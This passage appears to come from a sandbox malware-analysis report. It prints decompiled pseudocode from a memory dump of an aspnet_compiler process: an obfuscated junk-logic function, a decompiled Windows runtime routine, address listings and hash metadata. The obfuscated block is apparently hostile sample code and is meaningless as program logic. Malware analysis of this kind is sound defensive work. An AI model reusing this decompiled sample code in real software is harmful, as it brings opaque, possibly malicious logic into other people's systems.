									 *0x18ad9e05 =  *0x18ad9e05 & __esp;
									__esi = __esi &  *0xbe059c0e;
									asm("rcl dword [0x9cfe0cbc], 0x31");
									 *0x1198503 =  *0x1198503 +  *0x2d328860 * 0x181f;
									 *0xd363a704 =  *0xd363a704 ^ __bl;
									 *0xcc86df04 =  *0xcc86df04 >> 0x57;
									asm("ror byte [0x70b104b2], 0x6c");
									if(__ah < 0) {
										asm("adc edx, [0x5b2c471]");
										__edi = __edi - 0x223c1fd;
										__eax = __eax &  *0x8de1059c;
										 *0x34059cf8 =  *0x34059cf8 << 0x1d;
										 *0x9cfa09cf = __esi;
										asm("adc [0x3deb4d07], eax");
										asm("scasb");
										__edi = __edi - 1;
										_pop(__ecx);
										 *0xa0ff0707 =  *0xa0ff0707 & __edx;
										__edx = __edx + 0x574285ff;
										 *0x5d4c8318 =  *0x5d4c8318 >> 0x73;
										__eax =  *0xec1d0707;
										_pop(__eax);
										__edi = __edi &  *0x75571d8;
										asm("rcl byte [0xc673fb08], 0x89");
										asm("ror dword [0x68659e16], 0x6a");
										_t30 = __ecx;
										__ecx =  *0x337908f5;
										 *0x337908f5 = _t30;
										__ecx =  *0x337908f5 &  *0xc87f87a1;
										__edx = __edx - 1;
										asm("sbb ecx, [0x3b255af3]");
										__edi =  *0xb30f08f5;
										__esi = 0x236108f5;
										_t31 = __edx;
										__edx =  *0xd47b79a1;
										 *0xd47b79a1 = _t31;
										_push(0x236108f5);
										__esp = __esp - 0xcd3209f5;
										__edx = 0x107d16f3;
										__ecx =  *0xd095933;
										 *0xd095933 =  *0x337908f5 &  *0xc87f87a1;
										 *0x5c2b3bcb =  *0x5c2b3bcb | __esp;
										_push( *0x594b33b9);
										__edx = 0x107d16f3 &  *0x19d94509;
										__esi = 0x18cbf18f;
										 *0x7f0a5938 =  *0x7f0a5938 << 0x1d;
										 *0xa13ed467 =  *0xa13ed467 + __esp;
										__edi = __edi - 0x1013d4bb;
										__ebp =  *0xc2100b6a * 0xe70c;
										asm("sbb bh, 0xb7");
										__edx = 0x107d16f3 &  *0x19d94509 |  *0xc708973d;
										__cl = __cl |  *0x25092eb5;
										asm("adc ebp, [0x11f55e39]");
										 *0xdb510f33 = 0x236108f5;
										(0x107d16f3 &  *0x19d94509 |  *0xc708973d) - 1 =  *0xfd6d2a99;
										 *0xfd6d2a99 = (0x107d16f3 &  *0x19d94509 |  *0xc708973d) - 1;
										 *0x62696d8d =  *0x62696d8d ^ __ebx;
										__dl = __dl - 0x22;
										asm("cmpsw");
										if(__bh > 0x20) {
											 *0xbdf11476 =  *0xbdf11476 ^ __ebp;
											asm("adc edx, [0x8a2f00fc]");
											__esi = 0xfffffffff5d2b22c;
											__eax = __eax &  *0xc012a2c8;
											asm("rcr dword [0x9119b094], 0xf");
											__esp =  *0x5c52fc60 * 0x9312;
											asm("sbb esp, 0xb902535");
											_pop(__ebp);
											 *0x7359e71f =  *0x7359e71f - __esp;
											__eax =  *0x497c0697;
											_push(0x236108f5);
											asm("ror byte [0xc2c14f6], 0xde");
											asm("ror byte [0xb20dd6a0], 0xe");
											__eax =  *0x497c0697 + 1;
											 *0x6ebf248f =  *0x6ebf248f + __esp;
											_t36 = __cl;
											__cl =  *0x16071a0c;
											 *0x16071a0c = _t36;
											__ebx = __ebx + 1;
											__edi = __edi +  *0x98e3589e;
											 *0xb51cd62c =  *0xb51cd62c >> 6;
											asm("sbb cl, [0xf3a7b5f9]");
											__ecx = __ecx |  *0xf25b50bd;
											__eax =  *0x497c0697 + 0x00000001 | 0xdd171106;
											asm("rol dword [0xda45122f], 0x27");
											 *0xb93f0495 =  *0xb93f0495 << 0x35;
											__ecx =  *0xc7be8b69 * 0x5de6;
											if( *0xc7be8b69 * 0x5de6 <= 0) {
												goto L1;
											} else {
												_push( *0xb6431c76);
												__ebx = __ebx |  *0xf24ab529;
												 *0x47612662 =  *0x47612662 << 0xf5;
												__esi = 0xfffffffff5d2b22b;
												asm("adc eax, 0xe9061ede");
												__edx = 0xc7e650b8;
												asm("sbb edx, [0xeb413f87]");
												_pop(__eax);
												 *0x109bf4dc =  *0x109bf4dc << 0x40;
												__ebp = __ebp -  *0x2d40c8eb;
												 *0x7dcffa2d =  *0x7dcffa2d & __esp;
												__edi = __edi + 1;
												asm("rol byte [0xc181730], 0x40");
												__ebx = __ebx ^  *0x2251ef94;
												asm("ror dword [0x63e6fa87], 0xb8");
												__ebx =  *0x9ca3396a * 0xcbee;
												__eax =  *0xda4da669 * 0xc2b0;
												 *0xec68f417 =  *0xec68f417 << 0x75;
												asm("rcr dword [0xae9d8a19], 0x4c");
												asm("rcr byte [0xb33497d2], 0x67");
												__esi = 0xfffffffff5d2b22b &  *0x5843283e;
												__ah = 0xb2;
												_push(0xfffffffff5d2b22b &  *0x5843283e);
												__ebx =  *0x51cfb585;
												return  *0xda4da669 * 0xc2b0;
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t42 =  *0x8a5b6f09;
				 *0xe2fbac3a =  *0xe2fbac3a << 0xd4;
				 *0xd80d5962 =  *0xd80d5962 >> 0x94;
				_t86 = _t86 +  *0xd42ffed1;
				asm("rol dword [0x49f30da1], 0xe6");
				_t101 = _t101 |  *0xcd6b907;
				asm("adc [0x27be62cc], ecx");
				_t52 =  *0x4c6af8e6;
				asm("rcl byte [0x61261908], 0xa0");
				asm("ror dword [0xef2805f5], 0x5e");
				L1();
				_t2 = _t80 | 0x3070619a;
				_t80 =  *0xd9fa7c9c;
				 *0xd9fa7c9c = _t2;
				asm("rcr byte [0x731c7df2], 0x27");
				if(_t42 > 0xd9c1ae8) {
					asm("adc edi, 0xfd9e09bb");
					asm("adc esi, [0x373123f3]");
					 *0xf3b326f4 =  *0xf3b326f4 << 0x43;
					_push(_t64 - 0x24c955fa ^  *0xad1f370d | 0x000000c9);
					 *0x8b9fc10a =  *0x8b9fc10a ^ _t71;
					 *0x89c3023b =  *0x89c3023b >> 0x5b;
					_pop(_t69);
					 *0x6afee6c2 =  *0x6afee6c2 << 0x8d;
					 *0xe6c91d8a =  *0xe6c91d8a | _t52 - 0x00000001 | 0x00000014;
					 *0x626bb1bd = _t71 +  *0x38460a9c;
					asm("adc al, 0x12");
					asm("ror dword [0xcaffddc7], 0x5c");
					_t101 = 0xa99f0094;
					 *0xe8df222b =  *0x9033af85;
					asm("adc dh, 0x12");
					_t45 =  *0x93002a0c;
					 *0x93002a0c = _t42 + 0x0000000a & 0x000000f9;
					asm("adc ch, 0xe3");
					 *0xc3c651b4 = _t69;
					asm("rcl dword [0x300e6fed], 0x51");
					_t80 = (_t80 +  *0xa5c54f2f - 0x00000001 |  *0x160f6aff) + 1;
					 *0xa0e5fbd6 =  *0xa0e5fbd6 >> 0x77;
					 *0x5f260af2 =  *0x5f260af2 >> 0xe3;
					_pop(_t57);
					_t64 = _t69 -  *0xd05ea5f4;
					 *0xf17fe60b =  *0xf17fe60b >> 0x94;
					asm("stosb");
					asm("adc [0xe66c437], eax");
					asm("sbb [0xc5e55ecc], eax");
					asm("sbb al, [0xba4179e2]");
					 *0xc5f4d7be =  *0xc5f4d7be >> 0xf0;
					_t58 = _t57 + 1;
					 *0xc40009f9 =  *0xc40009f9 + _t45;
					asm("ror dword [0xbb39d8a1], 0xcd");
					_t86 =  *0x84bf4e25;
					asm("scasb");
					_t71 = 0xa0 -  *0x3c55651d ^  *0xb6825ee4;
					if(0xa2 == 0) {
						asm("adc [0xb2faa87a], edi");
						_t71 = _t71 &  *0xbe1ee96d;
						 *0x3498282b =  *0x3498282b >> 0x49;
						_push(0xa5ed0368);
						_t64 = (_t64 ^  *0x8689a4e7) & 0x00000080;
						if( *0xe01eda6a * 0xad24 == 0) {
							 *0x7668bbfe =  *0x7668bbfe - _t64;
							_t46 = _t45 |  *0x1b953786;
							 *0x3412f934 =  *0x3412f934 << 0x2f;
							L1();
							 *0xe382fce6 =  *0xe382fce6 >> 0xb;
							 *0xb5082a30 =  *0xb5082a30 << 0xf0;
							asm("scasd");
							asm("sbb eax, 0x2958af36");
							 *0x931ecd94 =  *0x931ecd94 + _t101;
							_t59 = _t58 + 0xb4;
							asm("sbb [0x356c71a], dh");
							_t86 = _t86 + 1;
							_t64 = _t101;
							asm("adc eax, [0x9778e5f4]");
							 *0xaa6bb40b =  *0xaa6bb40b - _t59;
							asm("sbb [0x510b800e], ecx");
							asm("lodsd");
							_t71 = _t71 &  *0xb9c4fe8 ^  *0x6a3db73d;
							asm("ror byte [0x84306604], 0x3d");
							_t101 = _t101 + 1;
							 *0x12d55c86 =  *0x12d55c86 + _t59 -  *0xdb6f22f2;
							 *0x70491025 =  *0x70491025 << 0xa4;
							 *0xe1446d28 =  *0xe1446d28 << 0xd1;
							if( *0xe1446d28 < 0) {
								 *0x9033ac79 = _t46;
								_t64 = _t64 + 0x12;
							}
						}
					}
				}
				goto L1;
			}
















                                                  0x0041bccb
                                                  0x0041bccb
                                                  0x0041bcd6
                                                  0x0041bcdc
                                                  0x0041bce3
                                                  0x0041bce4
                                                  0x0041bcea
                                                  0x0041bcf1
                                                  0x0041bcf8
                                                  0x0041bcfe
                                                  0x0041bd0a
                                                  0x0041bd10
                                                  0x0041bd17
                                                  0x0041bd1d
                                                  0x0041bd27
                                                  0x0041bd2d
                                                  0x0041bd33
                                                  0x0041bd39
                                                  0x0041bd3f
                                                  0x0041bd45
                                                  0x0041bd48
                                                  0x0041bd4e
                                                  0x0041bd54
                                                  0x0041bd55
                                                  0x0041bd5b
                                                  0x0041bd61
                                                  0x0041bd67
                                                  0x0041bd6d
                                                  0x0041bd6e
                                                  0x0041bd74
                                                  0x0041bd7a
                                                  0x0041bd80
                                                  0x0041bd81
                                                  0x0041bd87
                                                  0x0041bd8e
                                                  0x0041bd91
                                                  0x0041bd97
                                                  0x0041bda3
                                                  0x0041bda9
                                                  0x0041bdaa
                                                  0x0041bdb0
                                                  0x0041bdba
                                                  0x0041bdc1
                                                  0x0041bdcb
                                                  0x0041bdd1
                                                  0x0041bdd7
                                                  0x0041bde8
                                                  0x0041bdee
                                                  0x0041bdf4
                                                  0x0041bdfa
                                                  0x0041be00
                                                  0x0041be02
                                                  0x0041be08
                                                  0x0041be0e
                                                  0x0041be14
                                                  0x0041be1b
                                                  0x0041be21
                                                  0x0041be2a
                                                  0x0041be31
                                                  0x0041be3e
                                                  0x0041be44
                                                  0x0041be4a
                                                  0x0041be50
                                                  0x0041be59
                                                  0x0041be60
                                                  0x0041be66
                                                  0x0041be6c
                                                  0x0041be6d
                                                  0x0041be6e
                                                  0x0041be6f
                                                  0x0041be75
                                                  0x0041be81
                                                  0x0041be88
                                                  0x0041be8d
                                                  0x0041be8e
                                                  0x0041be94
                                                  0x0041be9b
                                                  0x0041bea2
                                                  0x0041bea2
                                                  0x0041bea2
                                                  0x0041bea8
                                                  0x0041beae
                                                  0x0041beb5
                                                  0x0041bebb
                                                  0x0041bebc
                                                  0x0041bec2
                                                  0x0041bec2
                                                  0x0041bec2
                                                  0x0041bec8
                                                  0x0041bec9
                                                  0x0041bed1
                                                  0x0041bed7
                                                  0x0041bed7
                                                  0x0041bedd
                                                  0x0041bee3
                                                  0x0041bee9
                                                  0x0041beef
                                                  0x0041bef5
                                                  0x0041befc
                                                  0x0041bf02
                                                  0x0041bf08
                                                  0x0041bf17
                                                  0x0041bf1a
                                                  0x0041bf20
                                                  0x0041bf26
                                                  0x0041bf2c
                                                  0x0041bf33
                                                  0x0041bf33
                                                  0x0041bf39
                                                  0x0041bf3f
                                                  0x0041bf42
                                                  0x0041bf47
                                                  0x0041bf4d
                                                  0x0041bf53
                                                  0x0041bf65
                                                  0x0041bf6b
                                                  0x0041bf71
                                                  0x0041bf7d
                                                  0x0041bf87
                                                  0x0041bf92
                                                  0x0041bf93
                                                  0x0041bf9a
                                                  0x0041bf9f
                                                  0x0041bfa0
                                                  0x0041bfa7
                                                  0x0041bfae
                                                  0x0041bfaf
                                                  0x0041bfc1
                                                  0x0041bfc1
                                                  0x0041bfc1
                                                  0x0041bfc7
                                                  0x0041bfc8
                                                  0x0041bfce
                                                  0x0041bfdb
                                                  0x0041bfe1
                                                  0x0041bfe7
                                                  0x0041bfec
                                                  0x0041bff3
                                                  0x0041bffa
                                                  0x0041c004
                                                  0x00000000
                                                  0x0041c00a
                                                  0x0041c00a
                                                  0x0041c011
                                                  0x0041c017
                                                  0x0041c01e
                                                  0x0041c01f
                                                  0x0041c024
                                                  0x0041c029
                                                  0x0041c02f
                                                  0x0041c030
                                                  0x0041c037
                                                  0x0041c03d
                                                  0x0041c043
                                                  0x0041c044
                                                  0x0041c04b
                                                  0x0041c051
                                                  0x0041c064
                                                  0x0041c06e
                                                  0x0041c078
                                                  0x0041c07f
                                                  0x0041c086
                                                  0x0041c08d
                                                  0x0041c093
                                                  0x0041c095
                                                  0x0041c096
                                                  0x0041c09c
                                                  0x0041c09c
                                                  0x0041c004
                                                  0x0041bf47
                                                  0x0041be3e
                                                  0x0041bdaa
                                                  0x0041bd91
                                                  0x0041bd61
                                                  0x0041bd2d
                                                  0x0041b8c6
                                                  0x0041b8c6
                                                  0x0041b8cb
                                                  0x0041b8d2
                                                  0x0041b8d9
                                                  0x0041b8e0
                                                  0x0041b8e7
                                                  0x0041b8f3
                                                  0x0041b8f9
                                                  0x0041b8ff
                                                  0x0041b90c
                                                  0x0041b913
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b923
                                                  0x0041b92a
                                                  0x0041b93e
                                                  0x0041b944
                                                  0x0041b962
                                                  0x0041b96c
                                                  0x0041b96d
                                                  0x0041b985
                                                  0x0041b98c
                                                  0x0041b9a1
                                                  0x0041b9b1
                                                  0x0041b9cd
                                                  0x0041b9d3
                                                  0x0041b9de
                                                  0x0041b9e5
                                                  0x0041b9f2
                                                  0x0041b9f8
                                                  0x0041ba01
                                                  0x0041ba01
                                                  0x0041ba07
                                                  0x0041ba10
                                                  0x0041ba1e
                                                  0x0041ba25
                                                  0x0041ba26
                                                  0x0041ba37
                                                  0x0041ba4d
                                                  0x0041ba4e
                                                  0x0041ba5f
                                                  0x0041ba66
                                                  0x0041ba67
                                                  0x0041ba6d
                                                  0x0041ba73
                                                  0x0041ba79
                                                  0x0041ba80
                                                  0x0041ba81
                                                  0x0041ba87
                                                  0x0041ba8e
                                                  0x0041ba9a
                                                  0x0041ba9b
                                                  0x0041baa1
                                                  0x0041baa7
                                                  0x0041baad
                                                  0x0041bab3
                                                  0x0041baba
                                                  0x0041bac5
                                                  0x0041bad2
                                                  0x0041bade
                                                  0x0041bae4
                                                  0x0041baea
                                                  0x0041baf1
                                                  0x0041bafc
                                                  0x0041bb03
                                                  0x0041bb0a
                                                  0x0041bb0c
                                                  0x0041bb11
                                                  0x0041bb17
                                                  0x0041bb1f
                                                  0x0041bb25
                                                  0x0041bb26
                                                  0x0041bb33
                                                  0x0041bb39
                                                  0x0041bb4b
                                                  0x0041bb51
                                                  0x0041bb52
                                                  0x0041bb58
                                                  0x0041bb5f
                                                  0x0041bb72
                                                  0x0041bb7e
                                                  0x0041bb87
                                                  0x0041bb8e
                                                  0x0041bb94
                                                  0x0041bb9a
                                                  0x0041bb9d
                                                  0x0041bb8e
                                                  0x0041bad2
                                                  0x0041baa1
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: f3d1f8d4775431e1d60d373aab3aa3a6131ed79184607a639975f1af75a4de78
                                                  • Instruction ID: 63104ca182369b5a53f8edb7ae3d0cbddc870cfdde4f83009d8fc5eb4c6c2c8e
                                                  • Opcode Fuzzy Hash: f3d1f8d4775431e1d60d373aab3aa3a6131ed79184607a639975f1af75a4de78
                                                  • Instruction Fuzzy Hash: 48F1A672A19381CFE716DF38D88AB813FB5F756324B08425EC5A1976D6C778204ACF89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E018BFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					L0189EEF0(0x1977b60);
					_t134 =  *0x1977b84; // 0x773b7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1977b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1977b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01896D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														L018976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01928938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0188B150();
													}
													_t116 = E01926D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018975CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1978638; // 0x0
																	_t122 = L018938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			L018976E2(_t154);
																			goto L41;
																		}
																	} else {
																		L018976E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L018BFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E018BFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E018BFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E018BFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E018BFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E018BFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1977b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1977b84 = _t75;
						_t73 = E0189EB70(_t134, 0x1977b60);
						if( *0x1977b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L0189FF60( *0x1977b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                  0x018bfab0
                                                  0x018bfab2
                                                  0x018bfab3
                                                  0x018bfab4
                                                  0x018bfabc
                                                  0x018bfac0
                                                  0x018bfb14
                                                  0x018bfb17
                                                  0x018bfac2
                                                  0x018bfac8
                                                  0x018bfacd
                                                  0x018bfad3
                                                  0x018bfad3
                                                  0x018bfadd
                                                  0x018bfb18
                                                  0x018bfb1b
                                                  0x018bfb1d
                                                  0x018bfb1e
                                                  0x018bfb1f
                                                  0x018bfb20
                                                  0x018bfb21
                                                  0x018bfb22
                                                  0x018bfb23
                                                  0x018bfb24
                                                  0x018bfb25
                                                  0x018bfb26
                                                  0x018bfb27
                                                  0x018bfb28
                                                  0x018bfb29
                                                  0x018bfb2a
                                                  0x018bfb2b
                                                  0x018bfb2c
                                                  0x018bfb2d
                                                  0x018bfb2e
                                                  0x018bfb2f
                                                  0x018bfb3a
                                                  0x018bfb3b
                                                  0x018bfb3e
                                                  0x018bfb41
                                                  0x018bfb44
                                                  0x018bfb47
                                                  0x018bfb4a
                                                  0x018bfb4d
                                                  0x018bfb53
                                                  0x018fbdcb
                                                  0x018fbdcb
                                                  0x018bfb59
                                                  0x018bfb5b
                                                  0x018bfb5b
                                                  0x018bfb5e
                                                  0x018fbdd5
                                                  0x018fbdd8
                                                  0x00000000
                                                  0x018fbdda
                                                  0x00000000
                                                  0x018fbdda
                                                  0x018bfb64
                                                  0x018bfb64
                                                  0x018bfb64
                                                  0x018bfb67
                                                  0x018bfb6e
                                                  0x018bfb70
                                                  0x018bfb72
                                                  0x00000000
                                                  0x018bfb78
                                                  0x018bfb7a
                                                  0x018bfb7a
                                                  0x018bfb7d
                                                  0x018bfb80
                                                  0x018fbddf
                                                  0x018fbde1
                                                  0x00000000
                                                  0x018fbde3
                                                  0x00000000
                                                  0x018fbde3
                                                  0x018bfb86
                                                  0x018bfb86
                                                  0x018bfb86
                                                  0x018bfb8b
                                                  0x018bfb90
                                                  0x018bfb92
                                                  0x018bfb94
                                                  0x018bfb9a
                                                  0x018bfb9b
                                                  0x018bfba1
                                                  0x018fbde8
                                                  0x018fbdeb
                                                  0x018fbded
                                                  0x018fbeb5
                                                  0x018fbeb5
                                                  0x018fbebb
                                                  0x018fbebd
                                                  0x018fbec3
                                                  0x018fbed2
                                                  0x018fbedd
                                                  0x018fbedd
                                                  0x018fbeed
                                                  0x00000000
                                                  0x018fbdf3
                                                  0x018fbdfe
                                                  0x018fbe06
                                                  0x018fbe0b
                                                  0x018fbe0d
                                                  0x018fbe0f
                                                  0x018fbe14
                                                  0x018fbe19
                                                  0x018fbe20
                                                  0x018fbe25
                                                  0x018fbe27
                                                  0x018fbe35
                                                  0x018fbe39
                                                  0x018fbe46
                                                  0x018fbe4f
                                                  0x018fbe54
                                                  0x018fbe56
                                                  0x018fbef8
                                                  0x018fbef8
                                                  0x00000000
                                                  0x018fbe5c
                                                  0x018fbe5c
                                                  0x018fbe60
                                                  0x00000000
                                                  0x018fbe66
                                                  0x018fbe66
                                                  0x018fbe7f
                                                  0x018fbe84
                                                  0x018fbe87
                                                  0x018fbe89
                                                  0x018fbe8b
                                                  0x018fbe99
                                                  0x018fbe9d
                                                  0x018fbea0
                                                  0x018fbeac
                                                  0x018fbeaf
                                                  0x018fbeb1
                                                  0x018fbeb3
                                                  0x018fbeb3
                                                  0x00000000
                                                  0x018fbea2
                                                  0x018fbea2
                                                  0x00000000
                                                  0x018fbea2
                                                  0x018fbe8d
                                                  0x018fbe8d
                                                  0x018fbe92
                                                  0x00000000
                                                  0x018fbe92
                                                  0x018fbe8b
                                                  0x018fbe60
                                                  0x018fbe3b
                                                  0x018fbe3b
                                                  0x018fbe3e
                                                  0x00000000
                                                  0x018fbe40
                                                  0x018fbe40
                                                  0x018fbe44
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018fbe44
                                                  0x018fbe3e
                                                  0x018fbe29
                                                  0x018fbe29
                                                  0x00000000
                                                  0x018fbe29
                                                  0x018fbe27
                                                  0x00000000
                                                  0x018bfba7
                                                  0x018bfba7
                                                  0x018bfbab
                                                  0x018fbf02
                                                  0x018bfbb1
                                                  0x018bfbb1
